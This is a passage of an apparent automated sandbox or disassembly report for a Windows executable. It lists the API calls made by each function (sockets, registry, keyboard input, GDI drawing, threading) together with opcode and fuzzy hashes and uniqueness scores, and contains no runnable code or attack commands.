          • InterlockedIncrement.KERNEL32(011D7F04), ref: 0115C610
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 0115C6C2
          Strings
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID: @COM_EVENTOBJ
          • API String ID: 327565842-2228938565
          • Opcode ID: 76e89021488eb2487d4f6dc6c87ec1b2d0fcd03b24dd45c1268d5fb0b59b7198
          • Instruction ID: 4ba1dc05154ded2609be9f437b9fd3ff85b4dc978d8da0b821883fbef52989b5
          • Opcode Fuzzy Hash: 76e89021488eb2487d4f6dc6c87ec1b2d0fcd03b24dd45c1268d5fb0b59b7198
          • Instruction Fuzzy Hash: D9D1E07190020ADBDB1DEF94C884BEEB7B8FF94308F108559D925AB285D774AD46CBD0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VariantClear.OLEAUT32(?), ref: 011A02D5
          • VariantClear.OLEAUT32(?), ref: 011A0409
          • VariantInit.OLEAUT32(?), ref: 011A045D
          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 011A04BE
          • VariantClear.OLEAUT32(?), ref: 011A04D0
            • Part of subcall function 0116548F: VariantCopy.OLEAUT32(?,?), ref: 011654A0
          • VariantCopy.OLEAUT32(?,?), ref: 011A0534
            • Part of subcall function 01165411: VariantClear.OLEAUT32(?), ref: 01165422
          • VariantClear.OLEAUT32(00000000), ref: 011A05C7
          Strings
          Similarity
          • API ID: Variant$Clear$Copy$CallDispFuncInit
          • String ID: H
          • API String ID: 3613100350-2852464175
          • Opcode ID: aed4caf85b9193919115f078fb2ebfb8feb940e375a416bfa66dd7579e1fe9ae
          • Instruction ID: e67b12820be1ec5017ae02333640b2f81bb9c0dba32df9b4add6abf3f8ae6c80
          • Opcode Fuzzy Hash: aed4caf85b9193919115f078fb2ebfb8feb940e375a416bfa66dd7579e1fe9ae
          • Instruction Fuzzy Hash: E5B18EB9608311AFE728DF58C480A2BBBE5FF8C318F458A2DF69597240D735E851CB52
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 011652F4
          • VariantClear.OLEAUT32(?), ref: 0116532E
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0116534E
          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01165381
          • VariantClear.OLEAUT32(?), ref: 011653C1
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 01165404
          Strings
          Similarity
          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
          • String ID: crts
          • API String ID: 586820018-3724388283
          • Opcode ID: fe0dd9a47d08659ba189eec8971ed8720a14f9503399b564b2daff8bd00eb013
          • Instruction ID: 484ed8f175350b3675785c3ecd5b59fd831bd355e872a96552318ba01b628509
          • Opcode Fuzzy Hash: fe0dd9a47d08659ba189eec8971ed8720a14f9503399b564b2daff8bd00eb013
          • Instruction Fuzzy Hash: 55416CB5200208DBDB24CF19D4C0A9AB7B9FF9C354F24812AEA598B355E735E951CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0117B433
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0117B466
          • EnterCriticalSection.KERNEL32(?), ref: 0117B483
          • _memmove.LIBCMT ref: 0117B4E1
          • _memmove.LIBCMT ref: 0117B504
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B513
          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0117B52F
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0117B544
          Similarity
          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
          • String ID:
          • API String ID: 2737351978-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • ___set_flsgetvalue.LIBCMT ref: 0114515A
          • __calloc_crt.LIBCMT ref: 01145166
          • __getptd.LIBCMT ref: 01145173
          • CreateThread.KERNEL32 ref: 0114519A
          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011451AA
          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 011451B5
          • _free.LIBCMT ref: 011451BE
          • __dosmaperr.LIBCMT ref: 011451C9
            • Part of subcall function 01147E9A: __getptd_noexit.LIBCMT ref: 01147E9A
          Similarity
          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
          • String ID:
          • API String ID: 3638380555-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • WSAStartup.WSOCK32(00000101,?), ref: 01195196
            • Part of subcall function 0118875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01196CC2,?,011A3B72,011A3B72,?), ref: 0118877B
          • inet_addr.WSOCK32(?,00000000,?,?), ref: 011951D8
          • gethostbyname.WSOCK32(?), ref: 011951E3
          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 01195259
          • _memmove.LIBCMT ref: 01195307
          • GlobalFree.KERNEL32 ref: 01195399
          • WSACleanup.WSOCK32 ref: 0119539F
          Similarity
          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
          • String ID:
          • API String ID: 2945290962-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetSystemMetrics.USER32 ref: 0117049C
          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 011706D8
          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 011706F7
          • InvalidateRect.USER32(?,00000000,00000001), ref: 0117071A
          • SendMessageW.USER32(?,00000469,?,00000000), ref: 0117074F
          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 01170772
          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0117078C
          Similarity
          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
          • String ID:
          • API String ID: 1457242333-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 011773E8
          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 011773F8
          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 01177433
          • LineTo.GDI32(?,?,FFFFFFFE), ref: 0117743C
          • CloseFigure.GDI32(?), ref: 01177443
          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 01177452
          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0117746E
          Similarity
          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
          • String ID:
          • API String ID: 4082120231-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119A51C
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0119A548
          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0119A573
          • RegEnumValueW.ADVAPI32 ref: 0119A5A6
          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0119A5CF
          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0119A608
          • RegCloseKey.ADVAPI32(?), ref: 0119A613
          Similarity
          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
          • String ID:
          • API String ID: 2027346449-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0119C54C
          • WSAGetLastError.WSOCK32(00000000), ref: 0119C55D
          Similarity
          • API ID: ErrorLastselect
          • String ID:
          • API String ID: 215497628-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetParent.USER32(?), ref: 01174320
          • GetKeyboardState.USER32(?), ref: 01174335
          • SetKeyboardState.USER32(?), ref: 01174389
          • PostMessageW.USER32(?,00000101,00000010,?), ref: 011743B9
          • PostMessageW.USER32(?,00000101,00000011,?), ref: 011743DA
          • PostMessageW.USER32(?,00000101,00000012,?), ref: 01174426
          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0117444B
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetParent.USER32(?), ref: 01174518
          • GetKeyboardState.USER32(?), ref: 0117452D
          • SetKeyboardState.USER32(?), ref: 01174581
          • PostMessageW.USER32(?,00000100,00000010,?), ref: 011745AE
          • PostMessageW.USER32(?,00000100,00000011,?), ref: 011745CC
          • PostMessageW.USER32(?,00000100,00000012,?), ref: 01174615
          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 01174637
          Similarity
          • API ID: MessagePost$KeyboardState$Parent
          • String ID:
          • API String ID: 87235514-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,00001308,?,00000000), ref: 01185314
          • ImageList_Remove.COMCTL32(?,?), ref: 01185348
          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 01185430
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
          • String ID:
          • API String ID: 2354583917-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
          • String ID:
          • API String ID: 3985565216-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: Rect$Client$Window$MetricsScreenSystem
          • String ID:
          • API String ID: 3220332590-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove_strncmp
          • String ID: >$U$\
          • API String ID: 2666721431-237099441
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetKeyboardState.USER32(?), ref: 0117C4E6
          • SetKeyboardState.USER32(00000080), ref: 0117C50A
          • PostMessageW.USER32(?,00000100,?,?), ref: 0117C54B
          • PostMessageW.USER32(?,00000104,?,?), ref: 0117C583
          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0117C5A5
          • SendInput.USER32(00000001,?,0000001C), ref: 0117C638
          Similarity
          • API ID: MessagePost$KeyboardState$InputSend
          • String ID:
          • API String ID: 2221674350-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: DestroyWindow$DeleteObject$IconMove
          • String ID:
          • API String ID: 1640429340-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: Destroy$DeleteMenuObject$IconWindow
          • String ID:
          • API String ID: 752480666-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconImageList_
          • String ID:
          • API String ID: 3275902921-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 0116319E
          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631B9
          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631C3
          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631CB
          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631D5
          Similarity
          • API ID: PerformanceQuery$CounterSleep$Frequency
          • String ID:
          • API String ID: 2833360925-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32 ref: 0118553C
          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 01185557
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconWindow
          • String ID:
          • API String ID: 3691411573-0
          • Opcode ID: d44c60486fee0cfa8a806e570aa4bfd206ab1ff611b8ccc1d9bd6b4da11e2b04
          • Instruction ID: 2ee6de16d9c303431b199ec0e1fb48d4fa5d44b368d418c26ce24a059425281d
          • Opcode Fuzzy Hash: d44c60486fee0cfa8a806e570aa4bfd206ab1ff611b8ccc1d9bd6b4da11e2b04
          • Instruction Fuzzy Hash: 86118271304301ABD768EF68E8C4A1677A9FB44325F108665FE14C72C4C735E8898F61
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • MoveToEx.GDI32(?,?,?,00000000), ref: 011771C4
          • LineTo.GDI32(?,?,?), ref: 011771D0
          • MoveToEx.GDI32(?,?,?,00000000), ref: 011771DE
          • LineTo.GDI32(?,?,?), ref: 011771EA
          • EndPath.GDI32(?), ref: 011771FA
          • StrokePath.GDI32(?), ref: 01177208
          Similarity
          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
          • String ID:
          • API String ID: 372113273-0
          • Opcode ID: 24d0de6695985d4be0ea5427e890c9d26312a637b9c767b7082e32d88f9d7176
          • Instruction ID: 2620eb1eac95d9f99a4357ced75b7db4a36274cb4c09944fff18b21d67dd47b5
          • Opcode Fuzzy Hash: 24d0de6695985d4be0ea5427e890c9d26312a637b9c767b7082e32d88f9d7176
          • Instruction Fuzzy Hash: 5B01D476102114BBE72A9B44EC8CFDB7B6DEF4A710F044114FA21A62C487B43585CBB5
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0113F048
          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0113F050
          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0113F05B
          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0113F066
          • MapVirtualKeyW.USER32(00000011,00000000), ref: 0113F06E
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0113F076
          Similarity
          • API ID: Virtual
          • String ID:
          • API String ID: 4278518827-0
          • Opcode ID: ddb0b6e4f204f0342a2b0b95dfa5c57f717a8b57ae6f3271d544101996f779c3
          • Instruction ID: c0c7d84eea60d74ff1c0042f46c1e13f84c103bb68cd033623a250d2bba8d595
          • Opcode Fuzzy Hash: ddb0b6e4f204f0342a2b0b95dfa5c57f717a8b57ae6f3271d544101996f779c3
          • Instruction Fuzzy Hash: F0016770106B88ADD3309F668C84B43FEF8EF95704F01491DD1D507A42C6B5A84CCB69
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • InterlockedExchange.KERNEL32(?,?), ref: 0117B5E1
          • EnterCriticalSection.KERNEL32(?), ref: 0117B5F2
          • TerminateThread.KERNEL32(?,000001F6), ref: 0117B600
          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0117B60E
            • Part of subcall function 011625E5: CloseHandle.KERNEL32(00000000,00000000,?,0117B61A,00000000,?,000003E8,?,000001F6), ref: 011625F3
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0117B623
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B62A
          Similarity
          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
          • String ID:
          • API String ID: 3495660284-0
          • Opcode ID: 4458b2cc288c9f77cf50b7dcc585679fb30126792a2bde475a3cc5c201489905
          • Instruction ID: ee71e6564bfdd164a845a7b801a5f823c73f396e03e2df84fb681a54de0d7f25
          • Opcode Fuzzy Hash: 4458b2cc288c9f77cf50b7dcc585679fb30126792a2bde475a3cc5c201489905
          • Instruction Fuzzy Hash: A5F04F72541201BBD229AB64ECC8DEBB77CFF45751B400526F602D6640CB35F4A9CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • ___set_flsgetvalue.LIBCMT ref: 011450E0
            • Part of subcall function 011477D1: TlsGetValue.KERNEL32(?,0114792A,?,011412DC,?,00000001), ref: 011477DA
            • Part of subcall function 011477D1: TlsSetValue.KERNEL32(00000000,?,011412DC,?,00000001), ref: 011477FB
          • ___fls_getvalue@4.LIBCMT ref: 011450EB
            • Part of subcall function 011477B1: TlsGetValue.KERNEL32(?,?,01143C50,00000000), ref: 011477BF
          • ___fls_setvalue@8.LIBCMT ref: 011450FD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 01145106
          • ExitThread.KERNEL32 ref: 0114510D
          • __freefls@4.LIBCMT ref: 01145129
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
          • String ID:
          • API String ID: 442100245-0
          • Opcode ID: a7866e9466ac39634ff87fa48d237a0f6f191ea0b51adb0d8cba47da53928ad2
          • Instruction ID: 83469099f69b11add4259919d6022163190bb051a3d63ef4c74337957fbde270
          • Opcode Fuzzy Hash: a7866e9466ac39634ff87fa48d237a0f6f191ea0b51adb0d8cba47da53928ad2
          • Instruction Fuzzy Hash: 12F0A078400742AFD70CFF74C588D0E3BAAAF9CE593618454E8088726ADB34D482CAA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: Menu$Item$DrawInfoInsert
          • String ID: 0
          • API String ID: 3076010158-4108050209
          • Opcode ID: 6794d0249dddb3d3084cffb9fea2eef7fe7ea1c18fe1a3acad9f4033ba5b6d0d
          • Instruction ID: 6168b0eff234185ecf270fbf6ecea836bc0d2617fd2c072081b3534ecbd0c115
          • Opcode Fuzzy Hash: 6794d0249dddb3d3084cffb9fea2eef7fe7ea1c18fe1a3acad9f4033ba5b6d0d
          • Instruction Fuzzy Hash: 17418E75A00209DFDB28CF99E888FDAB7B5FF88314F14811DE9169B384D770A885CB61
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: a31a958fa3f1dba40ba26c7e96ebde32b977c8444721446e68fee628694644cf
          • Instruction ID: 70e8e57e30637434b968368dedfb9d39230a3b56f063f8f1ada45548b44cecae
          • Opcode Fuzzy Hash: a31a958fa3f1dba40ba26c7e96ebde32b977c8444721446e68fee628694644cf
          • Instruction Fuzzy Hash: 90319371610209ABE738DF68D885BAA77A8EF44320F104649FEA1D73C0EB71D560DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetStdHandle.KERNEL32(000000F6), ref: 01173281
          Strings
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: de7f472ca8fd9c511438666056dc4ce0137fa7d2f10f32ad55d0b2b465cfb145
          • Instruction ID: 65888b5b0061b6af875e2b231629e621e90fc5c9d868c6b03804f42ba82a6b8d
          • Opcode Fuzzy Hash: de7f472ca8fd9c511438666056dc4ce0137fa7d2f10f32ad55d0b2b465cfb145
          • Instruction Fuzzy Hash: 82216F31610204ABE7289F6CD885BAAB7A8EF15320F108759FEB0D63C0EB719554CB91
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0118D446
          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0118D4BC
          • __swprintf.LIBCMT ref: 0118D4D6
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0118D51A
          Strings
          Similarity
          • API ID: ErrorMode$InformationVolume__swprintf
          • String ID: %lu
          • API String ID: 3164766367-685833217
          • Opcode ID: 7022a2ca37acc0cbadd1e5658a8e17b3b2a626c620db30c197c61693b4ffc7ed
          • Instruction ID: 3249a67a796685a541213a2acd3442ca785dafffe68483a20c3cb0b7b1f87539
          • Opcode Fuzzy Hash: 7022a2ca37acc0cbadd1e5658a8e17b3b2a626c620db30c197c61693b4ffc7ed
          • Instruction Fuzzy Hash: 97315271A1020AAFCB18EF94D985EEEB7B4FF88304F108565E515A7354E734EE45CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
            • Part of subcall function 01166406: SendMessageTimeoutW.USER32 ref: 01166425
            • Part of subcall function 01166406: GetWindowThreadProcessId.USER32(?,00000000), ref: 01166438
            • Part of subcall function 01166406: GetCurrentThreadId.KERNEL32 ref: 0116643F
            • Part of subcall function 01166406: AttachThreadInput.USER32(00000000), ref: 01166446
          • GetFocus.USER32 ref: 011912C7
            • Part of subcall function 01166451: GetParent.USER32(?), ref: 0116645F
            • Part of subcall function 01166451: GetParent.USER32(?), ref: 0116646B
          • GetClassNameW.USER32 ref: 01191310
          • EnumChildWindows.USER32 ref: 0119133B
          • __swprintf.LIBCMT ref: 01191354
          Strings
          Similarity
          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
          • String ID: %s%d
          • API String ID: 2645982514-1110647743
          • Opcode ID: 8d0f797155902476ecd787e6104f56398f33f0be3a7adafd94933003e1bbc1c0
          • Instruction ID: 9f92dd99e3ae6b6012ab1506eff7932911ba5f45ec12597f6d1c5ffaeba87d81
          • Opcode Fuzzy Hash: 8d0f797155902476ecd787e6104f56398f33f0be3a7adafd94933003e1bbc1c0
          • Instruction Fuzzy Hash: 0A215E7160031A6BD624AF699C84FEBB7BDAB99714F00801AF92997240DB70A955CB70
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetKeyboardState.USER32(?), ref: 0117C348
          • SetKeyboardState.USER32(00000080), ref: 0117C36C
          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0117C3B0
          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0117C3E8
          • SendInput.USER32(00000001,?,0000001C), ref: 0117C475
          Similarity
          • API ID: KeyboardMessagePostState$InputSend
          • String ID:
          • API String ID: 3031425849-0
          • Opcode ID: 08cbb607550736917a209a693e9ec5907aa935a38d48952a95201cadd82e68f7
          • Instruction ID: 4c36dae621ce4415e9f2c2ec776ded03c4cc77d9b88f922fe4c79a6b0ca0a6c8
          • Opcode Fuzzy Hash: 08cbb607550736917a209a693e9ec5907aa935a38d48952a95201cadd82e68f7
          • Instruction Fuzzy Hash: CC416A725042496AEB28DF6DD884BFE7B7CEF56310F008156FD849A282C335D655CBE1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0119449A
          • GetProcAddress.KERNEL32(?,?), ref: 01194534
          • GetProcAddress.KERNEL32(?,00000000), ref: 01194553
          • GetProcAddress.KERNEL32(?,?), ref: 01194597
          • FreeLibrary.KERNEL32(?,?,?,?), ref: 011945B9
          Similarity
          • API ID: AddressProc$Library$FreeLoad
          • String ID:
          • API String ID: 2449869053-0
          • Opcode ID: 280a781aeb9c1f4bc555d016572f068941a3070fd5a389687e9d77b86f6d2523
          • Instruction ID: 183d738e17ed95a229bda8a4a5ed51e1c23c502602378ec2d894fc126f3acbfe
          • Opcode Fuzzy Hash: 280a781aeb9c1f4bc555d016572f068941a3070fd5a389687e9d77b86f6d2523
          • Instruction Fuzzy Hash: 8C51A0756002059FDB18EFA8C980EAEB7B9FF99314F148159E915AB754C730ED42CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 011AD3F2
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 011AD407
          • Sleep.KERNEL32(?), ref: 011AD40F
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 011AD41A
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 011AD524
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID:
          • API String ID: 327565842-0
          • Opcode ID: a8bb58186cc2680eaf034cd6339859393acaf84e0079c4743e7ec6e7e1dcb0b6
          • Instruction ID: c5f8296c3ba140debeb11f4f84bb56b45066e09fc374362c616066b80aafe6c9
          • Opcode Fuzzy Hash: a8bb58186cc2680eaf034cd6339859393acaf84e0079c4743e7ec6e7e1dcb0b6
          • Instruction Fuzzy Hash: B841157560161A9BDF2EDFB8D8C4AAE7B74FB54308B404069E521E7784D730F944CB91
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetPrivateProfileSectionW.KERNEL32 ref: 0118C43C
          • GetPrivateProfileSectionW.KERNEL32 ref: 0118C464
          • WritePrivateProfileSectionW.KERNEL32 ref: 0118C4B0
          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0118C4D4
          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0118C4E3
          Similarity
          • API ID: PrivateProfile$SectionWrite$String
          • String ID:
          • API String ID: 2832842796-0
          • Opcode ID: 5f50ed0ea8e57b256ee18dfb179794f6d21149e72e974697256acb3d7b2d1096
          • Instruction ID: 15416974a41266e98baa84a996713299593bf1bc446d8387d99550dd1fe9c398
          • Opcode Fuzzy Hash: 5f50ed0ea8e57b256ee18dfb179794f6d21149e72e974697256acb3d7b2d1096
          • Instruction Fuzzy Hash: 424162B5A0420ABBDB14EBA4DC88FAEB3A8FF54704F14C558E9149B241DB75F944CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32 ref: 011794F1
            • Part of subcall function 01160593: _wcspbrk.LIBCMT ref: 011605A3
          • SendMessageW.USER32(?,00001074,?,?), ref: 01179551
          • _wcslen.LIBCMT ref: 01179566
          • _wcslen.LIBCMT ref: 01179573
          • SendMessageW.USER32(?,00001074,?,?), ref: 011795A7
          Similarity
          • API ID: MessageSend$_wcslen$_wcspbrk
          • String ID:
          • API String ID: 1856069659-0
          • Opcode ID: 810bbb4803b91121bd68e33733b66ffb2f64eb3d2cb2592629efe4bb1f1043e0
          • Instruction ID: aadda88b9b489a8c61566b33e6fa1f5d97c389b2d0a6057158c3c77f28ca2005
          • Opcode Fuzzy Hash: 810bbb4803b91121bd68e33733b66ffb2f64eb3d2cb2592629efe4bb1f1043e0
          • Instruction Fuzzy Hash: B2318671A0021D9BDB28DF59EC80EDEB774FF54724F00425AFA1497380E7719995CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: af724d5f1d47a70c453a802f94433d9a42af17467407828a71f5ad3a0c5e446e
          • Instruction ID: 5fe7825cc38916077ad1ca26c48b856a5b4c84ee5fb0fe10f71004c77ebffba5
          • Opcode Fuzzy Hash: af724d5f1d47a70c453a802f94433d9a42af17467407828a71f5ad3a0c5e446e
          • Instruction Fuzzy Hash: 8E21B2752007019BDB28EF29E8C4C6777BAFF49220B148669FE5187385DB30E845CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01194E62: inet_addr.WSOCK32(?), ref: 01194E86
          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0119503B
          • WSAGetLastError.WSOCK32(00000000), ref: 0119504A
          • connect.WSOCK32(00000000,?,00000010), ref: 01195083
          • WSAGetLastError.WSOCK32(00000000), ref: 011950AA
          • closesocket.WSOCK32(00000000,00000000), ref: 011950BE
          Similarity
          • API ID: ErrorLast$closesocketconnectinet_addrsocket
          • String ID:
          • API String ID: 245547762-0
          • Opcode ID: 7107a231d323c47e99826d6a5b35fa2d4372c0800ef3d955f84c4c1e9888a5f6
          • Instruction ID: 0e0c7fcc5251ba224db331ab4c7725b5a8a05f415309add7f2430f402b5c585b
          • Opcode Fuzzy Hash: 7107a231d323c47e99826d6a5b35fa2d4372c0800ef3d955f84c4c1e9888a5f6
          • Instruction Fuzzy Hash: B521F3322001005FD728EF6CDC48F6AB7E8EFA4724F04865AF964E7280CB70A8418BA4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • DeleteObject.GDI32(00000000), ref: 011770FC
          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
          • SelectObject.GDI32(?,00000000), ref: 0117714C
          • BeginPath.GDI32(?), ref: 01177161
          • SelectObject.GDI32(?,00000000), ref: 0117718A
          Similarity
          • API ID: Object$Select$BeginCreateDeletePath
          • String ID:
          • API String ID: 2338827641-0
          • Opcode ID: d0bb79484e81ea89e4be517d5a10a1c56ecc43f868d62bbaac44539fc2996b54
          • Instruction ID: b88b3798ba090c071f94f790922e85a2657d1654f8c76d5d36c82019fce77429
          • Opcode Fuzzy Hash: d0bb79484e81ea89e4be517d5a10a1c56ecc43f868d62bbaac44539fc2996b54
